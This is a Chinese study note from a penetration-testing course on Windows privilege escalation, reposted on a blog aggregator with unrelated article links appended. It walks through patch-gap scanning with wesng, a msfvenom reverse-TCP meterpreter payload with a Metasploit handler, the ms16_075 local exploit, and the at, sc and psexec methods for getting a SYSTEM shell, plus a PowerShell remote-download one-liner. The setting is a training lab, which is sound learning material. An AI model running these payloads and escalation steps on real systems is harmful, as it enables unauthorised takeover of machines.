Day59权限提升-win溢出漏洞ATSCps提权

针对Windows系统个人主流操作系统是win7/8/10等等,针对服务器就win2003和2008比较多,

明确权限提升问题,web和本地:

举个例子,现在获得了一个网站权限,这个权限只可以对网站自身的东西进行操作,而你需要对服务器操作,这个时候需要进行服务器提权,获取当前系统的权限,是管理用户,这种提权叫做web提权,借助web权限提升到系统权限,是在拿下网站权限之后的操作。

本地:比如我们Windows用户有很多用户,普通用户和管理用户,有一些东西普通用户操作不了,而我们需要操作,需要通过普通用户,提升到或者拿下管理用户的权限,这就叫做本地提权,是基于本地就有一个普通用户权限,不是基于web。

本地提权成功率很高,web就要低一些,web的权限比本地用户权限要低一些。

必备知识:

系统命令
命令    描述
systeminfo    打印系统信息
whoami    获得当前用户名
whoami /priv    当前账户权限
ipconfig    网络配置信息
ipconfig /displaydns    显示DNS缓存
route print    打印出路由表
arp -a    打印arp表
hostname    主机名
net user    列出用户
net user UserName    关于用户的信息
net use \SMBPATH Pa$$w0rd /u:UserName    连接SMB
net localgroup    列出所有组
net localgroup GROUP    关于指定组的信息
net view \127.0.0.1    会话打开到当前计算机
net session    开放给其他机器
netsh firewall show config    显示防火墙配置
DRIVERQUERY    列出安装的驱动
tasklist /svc    列出启动的服务
dir /s foo    在目录中搜索指定字符的项目
dir /s too==bar    同上
net start    列出启动的服务
sc query    列出所有服务
sc qc ServiceName    找到指定服务的路径
shutdown /r /t 0    立即重启
type file.txt    打印出内容
icacls “C\Example”    列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn    列出已安装的补丁
(New-Object System.Net.WebClient).DownloadFile(“https://host/file”,“C:\LocalPath”)    利用ps远程下载文件到本地
accesschk.exe -qwsu “Group”    修改对象(尝试Everyone,Authenticated Users和/或users)
这个需要自己了解。

system权限和Administrator权限是两个回事,system是系统权限,Administrator是管理用户权限,这个区别就是装操作系统的文件夹,Administrator是没有删除的权限,因为Administrator要引用到他,不能进行删除操作,而system就可以。

案例一:基于 WEB 环境下的权限提升-阿里云靶机 

这里我用我自己的phpstudy,php5.4.45环境,冰蝎后门链接命令执行作为演示

现在这个用户的权限添加用户就会报错

好吧,我这个电脑有问题,不光没有本地用户组,还不能添加新用户,然后在网搜教程新加了一个测试用户,就只有凑活着看吧,win+r 输入control userpasswords2

whoami /priv看一下这个用户能做的事情,查看当前用户权限

systeminfo 显示系统信息

systeminfo > 1.txt  将系统信息打印到1.txt文件里面

跟写入shell的地方,在同一个地址,换一下名字就可以查看

2.  提权操作流程:信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 

检测Windows安全缺陷工具wesng

这个工具,第一次使用会提示使用一条命令创建漏洞库出来。然后他会对比systeminfo打印的数据对比筛选,对比补丁的漏洞编号,

第一次用及输入个,python3 wes.py --update

就在目录下生成了vuln.csv的文件

这里就是可能存在漏洞。

这个可以在webshell里面使用,只需要主席systeminfo,然后把返回的信息打印出来,放在自己电脑上,然后直接对他进行扫描就行了。

#windowsVulScan

这里需要先运行  powershell  这个编译器

然后使用

打开生成的文件看

发现是这个,这个直接systeminfo,按这个格式写进去对应的信息,就不要在webshell执行powershell编译器了,正常的webshell也执行不了powershell,所以就是克服了这个困难。

然后

直接看着选项解释使用

正常回显是只有,因为我的电脑没有什么漏洞,所以exp没有信息。

#获取到相关漏洞编号的操作 

第一方法是直接用msf提权(优先选用)

因为msf是专门提权的工具,而且是会更新的,可能半年更新一次,然后收录提权漏洞的。在没有的情况下,再去搜索指定的exp。

第二个方法就是用指定的exp,直接github里面搜索cve的编号

解决虚拟机不能复制粘贴

在虚拟机没有办法复制粘贴文件,是因为没有安装vmtools。

安装这个久就可以了。

 案例web环境下的权限提升

msf,我们在利用的时候针对的都是外网的主机,一般msf提权,会有一个反弹,反弹到会话到主机。因为我们是本机,本机都在内网,他要反弹到内网主机,还要做端口映射,这是很麻烦的事情,所以建议买一个服务器装msf。

我是买不起,就用的虚拟机和虚拟靶机

先生成一个exe文件

msfvenom -p windows/meterpreter/reverse_tcp LPORT=5566(监听端口) LHOST=192.168.0.16(本机ip) -f exe(输出文件类型) -o test.exe(保存exp为test.exe)

---进入监听模块:use exploit/multi/handler 

---设置payload反弹:set payload windows/meterpreter/reverse_tcp 

---设置LHOST(0.0.0.0什么都监听)、LPORT参数(监听5566端口) 

然后把exe文件上传到靶机运行

这个exe执行之后会反弹到192.168.0.16上的5566端口,

输入getuid看一下是什么用户

因为我是靶机做的,也没有什么网站,所以回显管理用户

然后就在主机获取到的包里面选择一个exp使用

然后就随便搜索一个,我这个是靶机不可能复现成功

use windows/local/ms16_075_reflection_juicy   来到这个exp

show optings 查看需要配置得信息

background查看session会话号

设置会话号,设置payload,设置端口

这是老师演示的正常的

开打直接拿下系统权限。

基于本地环境下的权限提升-系统溢出漏洞

 

这个是我自己搭建的win2016靶场,把需要的提权文件放到靶机里面

直接点击运行他

就实现了提权很简单。

然后有一些webshell不能执行exe文件,原因后面补充,会有这个并不适用webshell,因为这个是最后弹窗一个新的命令提示符是系统权限,而webshell只会回显结果,并不会弹窗,

基于本地环境下的权限提升-AT&SC&PS 命令

1.  at提权(针对win7之前(2008之后)的操作系统)

---相关命令:

---at 21:26 /interactive cmd.exe //给系统添加一项作业,在21:26打开 

然后到了时间就会出现一个弹窗

这是win的一个逻辑漏洞,这个计划运行的时候,会system调用执行,

2.  sc提权

---使用sc命令创建一个syscmd的服务,绑定binPath的路径(以cmd打开):

 sc Create syscmd binPath= "cmd /K start" type= own type= interact 

然后在启动他就是system权限

而这两个的作用,就可以很简单的让一个普通用户得到系统权限,而不需要用麻烦的溢出的漏洞,这个就只需要两条命令。

3.  ps提权

--- pstools是微软官方工具,是为windows提供的第三方工具库:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

--- psexec.exe -accepteula -s -i -d cmd.exe 

先来到这个目录下,然后执行命令就可以

弹出窗口

system权限就拿到了。win2016也可以。

总结

案列一,演示的是溢出漏洞提权,思路是先利用systeminfo进行信息收集,然后开始筛选漏洞出来,然后用特有工具或者exp,拿下西瓜。

案例二,有一些提权是不适应webshell,这也是为什么本地提权比web提权大的原因,一些运行画家和数据的回显状态,成功几率就会低。有些漏洞就只适合在本地提权。

案列三,有一些不是漏洞,但也能提权,有操作系统版本上的区别。是对面系统上的设计逻辑造成的问题。第三方提权。

fa

cai

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/190924.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python字典类型

目录 目标 版本 官方文档 简介 实战 创建 循环 常用方法 目标 掌握字典类型的使用方法,包括:创建、循环、常用方法等操作。 版本 Python 3.12.0 官方文档 Mapping Types — dicthttps://docs.python.org/3/library/stdtypes.html#mapping-type…

Halcon参考手册目标检测和实例分割知识总结

1.1 目标检测原理介 目标检测:我们希望找到图像中的不同实例并将它们分配给某一个类别。实例可以部分重叠,但仍然可以区分为不同的实例。如图(1)所示,在输入图像中找到三个实例并将其分配给某一个类别。 图(1)目标检测示例 实例分割是目标检…

敌方移动发射[java坦克大战]

1.首先要确保判断如果敌人坦克存活并且敌人子弹集合等于0了,就根据坦克方向创建一颗子弹,放入到shots集合,并启动。(逻辑:发射子弹后,敌人坦克向前移动一段距离后转向,敌人坦克仍然存活并且刚发射的子弹消亡…

C++-设计一个特殊类

目录 一.设计一个类,不能被拷贝 二.设计一个类只能在堆上创建对象 三.设计一个类只能在栈上创建对象 四. 请设计一个类,不能被继承 五.请设计一个类,只能创建一个对象(单例模式) 1.单例模式: 2. 饿汉模式 一.设计一个类&#x…

代码浅析DLIO(四)---位姿更新

0. 简介 我们刚刚了解过DLIO的整个流程,我们发现相比于Point-LIO而言,这个方法更适合我们去学习理解,同时官方给出的结果来看DLIO的结果明显好于现在的主流方法,当然指的一提的是,这个DLIO是必须需要六轴IMU的&#x…

[WP] ISCTF2023 Web 部分题解

圣杯战争!!! 反序列化伪协议读取 where_is_the_flag 环境变量根目录当前目录 绕进你的心里 利用正则最大回溯绕过 easy_website or select 用双写绕过 空格用/**/绕,报错注入 wafr codesystem(ca\t /f*) webinclude 扫描得到index.bak备份文件打开为加密的代码 写…

1998-2021年全国各区县PM2.5平均浓度数据

1998-2021年全国各区县PM2.5平均浓度数据 1、时间:1998-2021年 2、指标:省、省代码、市、市代码、县代码、县、年份、均值、总和、最小值、最大值、标准差 3、来源:Washington university Atmospheric Composition Analysis Group 4、范围…

2023年第十二届数学建模国际赛小美赛C题雪崩防范求解分析

2023年第十二届数学建模国际赛小美赛 C题 雪崩防范 原题再现: 雪崩是极其危险的现象。现在,我们对雪崩是如何形成的已经有了很好的理解,但是我们还不能详细地预测雪崩发生的原因、时间和地点。村庄和道路可以通过各种方式防止雪崩。避免在脆…

Git Hooks实战:提交前检查修改文件中是否包含调试代码

说在前面 不知道大家有没有遇到这样一种情况,平时在写代码调试时有时候会使用到debugger,可能大部分时间在提交代码前会记得把debugger先删除,但可能也会存在将debugger提交上去的情况,那我们该怎么防止出现这种情况呢&#xff1…

css如何设置文本添加下划线

css文本添加下划线 text-decoration: underline;text-decoration相关属性参数 参数描述none默认。定义标准的文本。underline定义文本下的一条线。overline定义文本上的一条线。line-through定义穿过文本下的一条线。blink定义闪烁的文本。inherit规定应该从父元素继承 text-…

享元设计模式

package com.jmj.pattern.flyweight;public abstract class AbstractBox {//获取图形的方法public abstract String getShape();//显示图形及颜色public void diplay(String color){System.out.println("方块形状:"getShape()",颜色:"color);}}package com…

基于SpringBoot实现SSMP整合

🙈作者简介:练习时长两年半的Java up主 🙉个人主页:程序员老茶 🙊 ps:点赞👍是免费的,却可以让写博客的作者开心好久好久😎 📚系列专栏:Java全栈,…

23.Python 图形化界面编程

目录 1.认识GUI和使用tkinter2.使用组件2.1 标签2.2 按钮2.3 文本框2.4 单选按钮和复选按钮2.5 菜单和消息2.6 列表框2.7 滚动条2.8 框架2.9 画布 3. 组件布局4.事件处理 1.认识GUI和使用tkinter 人机交互是从人努力适应计算机,到计算机不断适应人的发展过程&#…

[ 蓝桥杯Web真题 ]-年度明星项目

目录 引入 介绍 准备 目标 效果 规定 思路 知识补充 解答参考 引入 hello,大家好!我注意到了之前发的一篇蓝桥杯Web应用开发的文章是关注度最高的,可能大部分关注我的小伙伴对蓝桥杯Web应用开发比较感兴趣,或者想要参加…

Flink(九)【时间语义与水位线】

前言 2023-12-02-20:05,终于写完啦,最近状态不错。刚写完又收到了她的消息哈哈哈哈,开心。 再去全力打拼一次,奋战一场,就算最后打了败仗也无所谓,至少你留下了足迹。 《解忧杂货店》 1、时间语义 …

出口贸易媒体发稿7种方法提升转化率的秘密武器解析-华媒舍

出口贸易成为了许多企业发展的重要方向。在这个竞争激烈的市场中,如何让自己的产品脱颖而出,吸引更多客户并提高转化率,成为了每个企业家都面临的挑战。本文将向大家介绍7种提升转化率的秘密武器:出口贸易媒体发稿方法。 1. 出口贸…

LeetCode刷题---合并两个有序链表

个人主页:元清加油_【C】,【C语言】,【数据结构与算法】-CSDN博客 个人专栏:http://t.csdnimg.cn/ZxuNL http://t.csdnimg.cn/c9twt 前言:这个专栏主要讲述递归递归、搜索与回溯算法,所以下面题目主要也是这些算法做的 我讲述…

基于深度学习的肺炎CT图像检测诊断系统

欢迎大家点赞、收藏、关注、评论啦 ,由于篇幅有限,只展示了部分核心代码。 文章目录 一项目简介 二、功能三、系统四. 总结 一项目简介 深度学习在肺炎CT图像检测诊断方面具有广泛的应用前景。以下是关于肺炎CT图像检测诊断系统的介绍: 任务…

基于PHP的高中生物学习平台

有需要请加文章底部Q哦 可远程调试 基于PHP的高中生物学习平台 一 介绍 此高中生物学习平台基于原生PHP开发,数据库mysql。系统角色分为用户和管理员。(附带参考设计文档) 技术栈:phpmysqlphpstudyvscode 二 功能 学生 1 注册/登录/注销 2 个人中心 …

人工智能时代:AIGC的横空出世

🌈个人主页:聆风吟 🔥系列专栏:数据结构、网络奇遇记 🔖少年有梦不应止于心动,更要付诸行动。 文章目录 📋前言一. 什么是AIGC?二. AIGC的主要特征2.1 文本生成2.2 图像生成2.3 语音生成2.4 视…